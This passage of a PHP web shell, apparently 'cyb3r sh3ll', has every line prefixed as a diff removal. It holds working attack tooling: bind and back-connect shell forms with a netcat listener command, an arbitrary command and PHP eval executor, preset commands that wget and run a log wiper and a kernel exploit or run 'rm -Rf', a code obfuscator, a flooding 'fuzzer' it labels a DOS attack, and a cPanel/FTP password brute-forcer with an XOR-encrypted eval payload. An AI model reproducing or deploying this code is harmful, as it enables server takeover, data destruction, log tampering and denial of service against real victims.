- ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php

-

- foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

-

- ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>

-

-<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php

-

-foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

-

-?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>

-

-Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>

-

-<b>Datapipe:</b><br>

-<form action="<?php echo $surl; ?>">

-<input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php

-

-foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}

-

-?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.

-

-

-

-        

-                 </center></td>

-            

-                 <td ><center>

-                 <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>

-                 

-<form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>

-<div align="center">Useful Commands   </div>

-

-

-    <form action="<?php echo $surl; ?>">

-

-      <div align="center">

-

-        <input type=hidden name=act value="cmd">

-

-        <input type=hidden name="d" value="<?php echo $dispd; ?>">

-

-          <SELECT NAME="cmd">

-

-            <OPTION VALUE="uname -a">Kernel version</option>

-

-              <OPTION VALUE="w">Logged in users</option>

-

-                <OPTION VALUE="lastlog">Last to connect</option>

-

-                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>

-

-                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>

-

-                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>

-

-                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>

-

-                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>

-

-                    <OPTION VALUE="netstat -atup | grep IST">Open ports</option>

-

-                    <OPTION VALUE="locate gcc">gcc installed?</option>

-

-                                        <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>

-

-                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>

-

-                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>

-

-                    <OPTION VALUE="./zap2">WIPELOGS PT3</option>

-

-                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>

-

-                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>

-

-                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>

-

-                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>

-

-                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>

-

-                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>

-

-                  </SELECT>

-

-        <input type=hidden name="cmd_txt" value="1">

-

-        &nbsp;

-

-        <input type=submit name=submit value="Execute">

-

-          <br>

-

-        Warning. Kernel may be alerted using higher levels </div>

-

-    </form>

-

-                 </center>

-                 </td>

-                        

-         </tr>

-     

- </table><?php

- 

-}

-

-if ($act == "cmd")

-

-{

-

-if (trim($cmd) == "ps -aux") {$act = "processes";}

-

-elseif (trim($cmd) == "tasklist") {$act = "processes";}

-

-else

-

-{

-

- @chdir($chdir);

-

- if (!empty($submit))

-

- {

-

-  echo "<b>Result of execution this command</b>:<br>";

-

-  $olddir = realpath(".");

-

-  @chdir($d);

-

-  $ret = myshellexec($cmd);

-

-  $ret = convert_cyr_string($ret,"d","w");

-

-  if ($cmd_txt)

-

-  {

-

-   $rows = count(explode("\r\n",$ret))+1;

-

-   if ($rows < 10) {$rows = 10;}

-

-   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";

-

-  }

-

-  else {echo $ret."<br>";}

-

-  @chdir($olddir);

-

- }

-

- else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}

-

- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";

-

-}

-

-}

-

-if ($act == "phpcode")

-{

- echo "

-<br><center>

-<a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>

-<a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>

-</center><br>";

-}

-

-if ($act == "eval")

-

-{

-

- if (!empty($eval))

-

- {

-

-  echo "<b>Result of execution this PHP-code</b>:<br>";

-

-  $tmp = ob_get_contents();

-

-  $olddir = realpath(".");

-

-  @chdir($d);

-

-  if ($tmp)

-

-  {

-

-   ob_clean();

-

-   eval($eval);

-

-   $ret = ob_get_contents();

-

-   $ret = convert_cyr_string($ret,"d","w");

-

-   ob_clean();

-

-   echo $tmp;

-

-   if ($eval_txt)

-

-   {

-

-    $rows = count(explode("\r\n",$ret))+1;

-

-    if ($rows < 10) {$rows = 10;}

-

-    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";

-

-   }

-

-   else {echo $ret."<br>";}

-

-  }

-

-  else

-

-  {

-

-   if ($eval_txt)

-

-   {

-

-    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";

-

-    eval($eval);

-

-    echo "</textarea>";

-

-   }

-

-   else {echo $ret;}

-

-  }

-

-  @chdir($olddir);

-

- }

-

- else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}

-

- echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";

-

-}

-

-if ($act == "proxy")

-{

-global $errorbox,$et,$footer,$hcwd;

-echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";

-if (!empty($_REQUEST['urL'])){

-$dir="";

-$u=parse_url($_REQUEST['urL']);

-$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';

-if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));

-$url=@fsockopen($host, 80, $errno, $errstr, 12);

-if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");

-fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");

-while(!feof($url)){

-$con = fgets($url);

-$con = str_replace("href=mailto","HrEf=mailto",$con);

-$con = str_replace("HREF=mailto","HrEf=mailto",$con);

-$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);

-$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);

-$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);

-$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);

-$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);

-$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);

-echo $con;

-}

-fclose($url);

-}

-}

-

-

-if ($act == "obfuscate")

-{

-  if ( isset($_POST['code']) &&

-               $_POST['code'] != '')

-    {

-        $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P

-        $encode = '

-<?php

-$encoded = \''.$encoded.'\';

-eval(gzinflate(base64_decode($encoded)));

-// Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.

-?>

-';

-    }

-    else

-    {

-        $encode = 'Please Enter your Code! and Click Submit! :)';    

-    }?>

-    <form method="POST">

-        <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />

-        <input style="margin: 20px; margin-left: 50px; padding: 10px;"  class="own"  type="submit" value="Encode :D"/>

-    </form>

-    <?php

-}

-

-if ($act == "fuzzer")

-{

-    if(isset($_POST['ip']) &&

-    isset($_POST['port']) &&

-    isset($_POST['times']) &&

-    isset($_POST['time']) &&

-    isset($_POST['message']) &&

-    isset($_POST['messageMultiplier']) &&

-    $_POST['message'] != "" &&

-    $_POST['time'] != "" &&

-    $_POST['times'] != "" &&

-    $_POST['port'] != "" &&

-    $_POST['ip'] != "" &&

-    $_POST['messageMultiplier'] != ""

-    )

-    {

-       $IP=$_POST['ip'];

-           $port=$_POST['port'];

-       $times = $_POST['times'];

-           $timeout = $_POST['time'];

-           $send = 0;

-       $ending = "";

-       $multiplier = $_POST['messageMultiplier'];

-       $data = "";

-       $mode="tcp";

-       $data .= "POST /";

-       $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";

-        if($_POST['type'] == "tcp")

-        {

-            $mode = "tcp";

-        }

-        while($multiplier--)

-        {

-            $data .= urlencode($_POST['message']);

-        }

-        $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers

-        $data .= "by-cyb3r-sh3ll".$ending;

-        $length = strlen($data);

-        

-        

-       echo "Sending Data :- <br /> <p align='center'>$data</p>";

-        

-       print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";

-           for($i=0;$i<$times;$i++)

-           {

-            $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);

-            if($socket)

-            {

-                fwrite($socket , $data , $length );

-                fclose($socket);

-            }

-        }

-        echo "<script>alert('Fuzzing Completed!');</script>";

-        echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";

-        echo "Total Number of Packets Sent : " . $times . "<br />";

-        echo "Total Data Sent = ". showsizE($times*$length) . "<br />"; 

-        echo "Data per packet = " . showsizE($length) . "<br />";

-    }

-    else

-    {

-        ?>

-        <form method="POST">

-            <input type="hidden" name="fuzz" />

-            <table id="margins">

-                <tr>

-                    <td width="400" class="title">

-                        IP

-                    </td>

-                    <td>

-                        <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td class="title">

-                        Port

-                    </td>

-                    <td>

-                        <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td class="title">

-                        Timeout

-                    </td>

-                    <td>

-                        <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>

-                    </td>

-                </tr>

-                

-                

-                <tr>

-                    <td class="title">

-                        No of times

-                    </td>

-                    <td>

-                        <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td class="title">

-                        Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>

-                    </td>

-                    <td>

-                        <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>

-                    </td>

-                    <td>

-                        x

-                    </td>

-                    <td width="20">

-                        <input style="width: 30px;" name="messageMultiplier" value="10" />

-                    </td>

-                </tr>

-                

-                <tr>

-                    <td rowspan="2">

-                        <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>

-                    </td>

-                </tr>

-            </table>            

-        </form>

-        <?php

-    }

-}

-

-if ($act == "cpanel")

-{ 

-$cpanel_port="2082";

-$connect_timeout=5;

-set_time_limit(0);

-$submit=$_REQUEST['submit'];

-$users=$_REQUEST['users'];

-$pass=$_REQUEST['passwords'];

-$target=$_REQUEST['target'];

-$cracktype=$_REQUEST['cracktype'];

-if($target == ""){

-$target = "localhost";

-}

-$charset=$_REQUEST['charset'];

-if($charset=="")

- $charset="lowercase";

-$max_length=$_REQUEST['max_length'];

-if($max_length=="")

- $max_length=10;

-$min_length=$_REQUEST['min_length'];

-if($min_length=="")

- $min_length=1;

-

- $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");

- $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");

- $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");

- $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");

- $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");

- $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");

- $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );

- $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );

- $charsetlettersnumericsymbols=array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_","0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );

-        if ($charset == "all")

-                $vals = $charsetall;

-    elseif ($charset == "lowercase") 

-                $vals = $charsetlower;

-         elseif ($charset == "uppercase") 

-                $vals = $charsetupper;

-         elseif ($charset == "numeric") 

-                $vals = $charsetnumeric;

-         elseif ($charset == "lowernumeric") 

-                $vals = $charsetlowernumeric;

-         elseif ($charset == "uppernumeric") 

-                $vals = $charsetuppernumeric;

-        elseif ($charset == "letters") 

-                $vals = $charsetletters;

-        elseif ($charset == "symbols") 

-                $vals = $charsetsymbols;

-        elseif ($charset == "lowersymbols") 

-                $vals = $charsetlowersymbols;

-        elseif ($charset == "uppersymbols") 

-                $vals = $charsetuppersymbols;

-        elseif ($charset == "letterssymbols") 

-                $vals = $charsetletterssymbols;

-        elseif ($charset == "numberssymbols") 

-                $vals = $charsetnumericsymbols;

-        elseif ($charset == "lowernumericsymbols") 

-                $vals = $charsetlowernumericsymbols;

-        elseif ($charset == "uppernumericsymbols") 

-                $vals = $charsetuppernumericsymbols;

-        elseif ($charset == "lettersnumericsymbols") 

-                $vals = $charsetlettersnumericsymbols;

-        else echo "INVALID CHARSET";

-        $key_that_script_is_crypted=19;

-$resource_crypted_code ='7~`3.37L@VAEVAH1@VAEVAL]R^V1N=7L@VAEVAH1@PAZCGL]R^V1N(7`fq3.31@{v3--3)313=37~`(7|3.3raarj3;1|~1?1g~rz1?1yLr~a"1?1S{|1?1=p1:(7vv3.37|H!N=7|H N=7|H"N=7|H[t3]N=7|H#N(7`v}w3.3S~rz;7vv?7`fq?7~`:(3';

-$string_output=str_replace("[t1]", "<?", $resource_crypted_code);

-$string_output=str_replace("[t3]", "'", $string_output);

-$lenth_of_crypted_code=strlen($string_output);

-$eval_php_code='';

-for($huivamvsem=0;$huivamvsem<$lenth_of_crypted_code;$huivamvsem++)

-$eval_php_code .= chr(ord($string_output[$huivamvsem]) ^ $key_that_script_is_crypted);

-eval($eval_php_code);

-?>

-<div align="center">

- 

- <form method="POST" >

- <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700" >

-     <tr>

-            <td>

-                  <p align="center"><b>

-                    <font color="#008000" face="Tahoma" size="2">IP servers :</font></b>

-                        <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px; background-color: #800000; color:#C0C0C0 font-family:Verdana; font-size:13px;" /><br/><br/>

-                        <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700">

-                <tr><td align="center" width="50%"><font color="#FF0000"><b>User List</b></font></td><td align="center"><font color="#FF0000"><b>Password List</b></font></td></tr>

-            </table>

-                        <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?></textarea>

-            <textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br/>

-                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Guess options</font>

-                        &nbsp;<input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio">

-                        <b><font size="2" face="Tahoma" color="#008000">Cpanel </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b>

-                        <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio">

-                        <b><font size="2" face="Tahoma" color="#008000">Telnet</font><font size="2" color="#FFFFFF" face="Tahoma">(23)</font></b>

-                        <br/>

-                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Timeout Delay</font>

-                        <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>" /><br/>

-                        <input type="checkbox" name="bruteforce" value="true" /><font style="font-weight:700" size="2" face="Tahoma" color="#008000">Bruteforce</font>

-                        <select name="charset" style="border: 2px solid #1D1D1D;background: black;color:RED">

-                                <option value="all">All Letters + Numbers</option>

-                                <option value="numeric">Numbers</option>

-                                <option value="letters">Letters</option>

-                                <option value="symbols">Symbols</option>

-                                <option value="lowercase">Lower Letters</option>

-                                <option value="uppercase">Higher Letters</option>

-                                <option value="lowernumeric">Lower Letters + Numbers</option>

-                                <option value="uppernumeric">Upper Letters + Numbers</option>

-                                <option value="lowersymbols">Lower Letters + Symbols</option>

-                                <option value="uppersymbols">Upper Letters + Symbols</option>

-                                <option value="letterssymbols">All Letters + Symbols</option>

-                                <option value="numberssymbols">Numbers + Symbols</option>

-                                <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>

-                                <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>

-                                <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>

-            </select><br/>

-                    <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>

-                        <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>

-                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>

-                        <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>

-                        <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>

-                </p>

-                </td>

-         </tr>

- 

- </table>

- </form>

- 

-<?php

-function brute()

-{

-        global $vals,$min_length,$max_length;

-        global $target,$pureuser,$connect_timeout;

-        $min=$min_length;

-        $max=$max_length;

-        $A = array();

-        $numVals = count($vals);

-        $incDone = "";

-        $realMax = "";

-        $currentVal = "";

-        $firstVal = "";

-        for ($i = 0; $i < ($max + 1); $i++) {

-                $A[$i] = -1;

-        }

-        

-        for ($i = 0; $i < $max; $i++) {

-                $realMax = $realMax . $vals[$numVals - 1];

-        }

-        for ($i = 0; $i < $min; $i++) {

-                $A[$i] = $vals[0];

-        }

-        $i = 0;

-        while ($A[$i] != -1) {

-                $firstVal .= $A[$i];

-                $i++;

-        }

-        //echo $firstVal . "<br>";

-        cpanel_check($target,$pureuser,$firstVal,$connect_timeout);

-        

-        while (1) {

-                for ($i = 0; $i < ($max + 1); $i++) {

-                        if ($A[$i] == -1) {

-                                break;

-                        }

-                }

-                $i--;

-                $incDone = 0;

-                while (!$incDone) {     

-                        for ($j = 0; $j < $numVals; $j++) {

-                                if ($A[$i] == $vals[$j]) {

-                                        break;

-                                }

-                        }

-                        if ($j == ($numVals - 1)) {

-                                $A[$i] = $vals[0];

-                                $i--;

-                                if ($i < 0) {

-                                        for ($i = 0; $i < ($max + 1); $i++) {

-                                                if ($A[$i] == -1) {

-                                                        break;

-                                                }

-                                        }

-                                        $A[$i] = $vals[0];

-                                        $A[$i + 1] = -1;

-                                        $incDone = 1;

-                                        print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";

-                                }

-                        } else {

-                                $A[$i] = $vals[$j + 1];

-                                $incDone = 1;

-                        }

-                }

-                $i = 0;

-                $currentVal = "";

-                while ($A[$i] != -1) {

-                        $currentVal = $currentVal . $A[$i];

-                        $i++;

-                }

-                cpanel_check($target,$pureuser,$currentVal,$connect_timeout);

-                //echo $currentVal . "<br>";

-                if ($currentVal == $realMax) {

-                        return 0;

-                }

-        }

-}

-function getmicrotimev() {

-   list($usec, $sec) = explode(" ",microtime());

-   return ((float)$usec + (float)$sec);

-} 

-

-function ftp_check($host,$user,$pass,$timeout)

-{

- $ch = curl_init();

- curl_setopt($ch, CURLOPT_URL, "ftp://$host");

- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

- curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);

- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");

- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

- curl_setopt($ch, CURLOPT_FAILONERROR, 1);

- $data = curl_exec($ch);

- if ( curl_errno($ch) == 28 )

- {

- print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">

- <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout

- Please Check The Target Hostname .</font></font></b></p>";exit;

- }

- else if ( curl_errno($ch) == 0 )

- {

-  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">

- Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"

- and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";

- }

- curl_close($ch);

-}

-function cpanel_check($host,$user,$pass,$timeout)

-{

- global $cpanel_port;

- $ch = curl_init();

- //echo "http://$host:".$cpanel_port." $user $pass<br>";

- curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);

- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");

- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

- curl_setopt($ch, CURLOPT_FAILONERROR, 1);

- $data = curl_exec($ch);

- if ( curl_errno($ch) == 28 )

- {

-  print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">

-  <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout

-  Please Check The Target Hostname .</font></font></b></p>";exit;

- }

- else if ( curl_errno($ch) == 0 )

- {

-  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\"> 

-  Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"

